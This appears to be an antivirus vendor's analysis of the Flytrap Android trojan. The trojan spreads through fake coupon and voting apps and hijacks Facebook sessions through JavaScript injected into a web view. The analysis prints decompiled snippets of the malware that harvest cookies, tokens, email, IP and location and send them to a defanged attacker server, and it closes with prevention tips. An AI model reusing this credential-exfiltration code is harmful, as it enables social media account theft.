General Explanation

Type: Trojan

Degree of destruction: average

Prevalence: average

What is Trojan?

Trojans are malware types that introduced themselves as healthy and legal software and act similar to practical and applicable software but cause many destructions to the system when executing. The downloaded software from the internet, placing HTML text, attaching to an email, etc. are ways that Trojans are using to enter the system. Contrary to viruses and computer worms, Trojans are not reproducible.

What is Flytrap malware?

The main goal of this malware is obtaining user’s social media account such as Facebook. This malware is distributing using existing applications on different stores such as Google Play or unauthorized stores. This malware acts as an application but steals user’s account information from social media applications using the hijacking technique. Also, it shows related advertisements by using collected data such as location. This malware is distributed through Google play store and other unauthorized stores and in the form of attractive applications such as Netflix free coupon, Google Adwords coupon codes, and voting applications for choosing the best soccer team and player. Users who installed this application will be directed to Facebook main page due to multiple excuses such as voting or collecting coupon codes or credit.


Technical Explanation


This application exists for download on android stores named “Free Netflix Coupon”. After installing and running this application and inside the main activity, users will view the “Receive Free Netflix Coupon” message. Immediately, the “couponActivity” will be run by clicking on the “Receive Coupon” option that is hidden from the sight of the user. It is a web view page, and the attacker immediately uses the JavaScript injection technique inside the web view to load its JavaScript code and to show the login page linked to Facebook so it can easily collect the user’s account data.



First, it checks browser cookie files to know whether the user logged in to Facebook address previously. If the user did not log in, it shows the Facebook login page in the form of a web view. This is not a fake page, and its URL is correct, but injecting infected JavaScript in this web view will collect critical data from the user without their notice. Then, the collected data will be sent in the form of a JSON file to the infected server of the malware, when the user enters the data to log in to the main Facebook login page:

” Email, FacebookID, FeatureImage, Location, UserAgent, Cookie, Ip, Date, Token, fromApp (name of the application)

private final void CouponActivity.getDataIntent()             //method@782d


   String v7;

   String v6;

   String v3;

   String v12;

   String v5;

   String v11;

   String v1 = “”;

   if (!CookieManager.getInstance().getCookie(v1)) {



   v7 = CookieManager.getInstance().getCookie(v1);

   Intrinsics.checkNotNullExpressionValue(v7, “getInstance\x28\x29.getCookie\x28com.emranul.movieinfo.util.Constant.URL_GET_COOKIE_FACEBOOK\x29”);

   v6 = this.getIntent().getStringExtra(“user_agent”);

   v3 = this.getIntent().getStringExtra(“user_id”);

   v12 = this.getIntent().getStringExtra(“email”);

   if (!v6 || !v12 || TextUtils.isEmpty(v6) || TextUtils.isEmpty(v3) || TextUtils.isEmpty(v7) || TextUtils.isEmpty(v12)) {




   v5 = Locale.getDefault().getDisplayLanguage();

   Intrinsics.checkNotNullExpressionValue(v5, “getDefault\x28\x29.getDisplayLanguage\x28\x29”);

   v11 = this.getResources().getString(0x7f0f001b);

   Intrinsics.checkNotNullExpressionValue(v11, “resources.getString\x28R.string.app_name\x29”);

   v2 = new Data(v3, () + “” + v3 + “/picture?type=large”, v5, v6, v7, this.getIpAdress(), ShareUtils.INSTANCE.getCurrentDate(), “Empty”, v11, v12);

   RetrofitBuilder.INSTANCE.getApiService().null_saveData(v0.getIdFacebook(), v0.getFeatureImage(), v0.getLocation(), v0.getUserAgent(), v0.getCookie(), v0.getIp(), v0.getDate(), v0.getToken(), v0.getFromApp(), v0.getEmail()).null_enqueue(new CouponActivity$getDataIntent$1(this));



Malware uses the existing APIs in the Retrofit library to create a connection between the server and the client and to send and receive information in JSON format.

In order to authenticate with OAuth, an access token will be assigned to the user for each and any of the network requests that will be sent to a unique address. After the malware obtained all values for the aforementioned data, it will turn them into a string (values and data) and sending to its server address: “hxxp [:]///quanlysanpham [.]Work”


Public String Data.toString () {

Return new String Builder () +”Data\x28idFacebook=”+this.idFacebook+”, featureImage=”+this.featureImage+”, location=”+this.location+”,

userAgent=”+this.userAgent+”, cookie=”+this.cookie+”, ip=”+this.ip+”, date=””, token=”+this.token+”, fromApp=”+this.fromApp+”, email=”;}


One of the other functions of this malware is accessing the user’s location to send advertisements through advertising services such as google ads, etc. Also, the application will be set at certain intervals to collect the longitude and latitude values (user’s location) of the user. To show advertisements, it used InstanceID API using specified advertisement identification inside the application codes.

public static AdvertisingIdClient$Info

AdvertisingIdClient.getAdvertisingIdInfo(Context p0)             //method@7a8f


   zzb v0 = new zzb(p0);

   boolean v1 = v0.getBoolean(“gads:ad_id_app_context:enabled”, false);

   AdvertisingIdClient v3 = new AdvertisingIdClient(p0, -1, v1, v0.getBoolean(“gads:ad_id_use_persistent_service:enabled”, false));


   p0 = v0.getInfo();

   v0.zza(p0, v1, v0.getFloat(“gads:ad_id_app_context:ping_ratio”, 0), (SystemClock.elapsedRealtime()-SystemClock.elapsedRealtime()), v0.getString(“gads:ad_id_use_shared_preference:experiment_id”, “”), null);


   return p0;


How to deal with this malware and disinfect the system

Install and update the Padvish Antivirus database file, and scan your device to assure your device is not infected by the malware.

How to prevent the device from infection:

  1. Avoid downloading and installing the application from unauthorized sources and stores
  2. Pay attention to the access permissions when installing an application
  3. Continuously back up files and stored data
  4. Do not use unofficial versions of the application. There are many unofficial versions of applications such as Instagram and Telegram that are distributed through telegram channels.

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>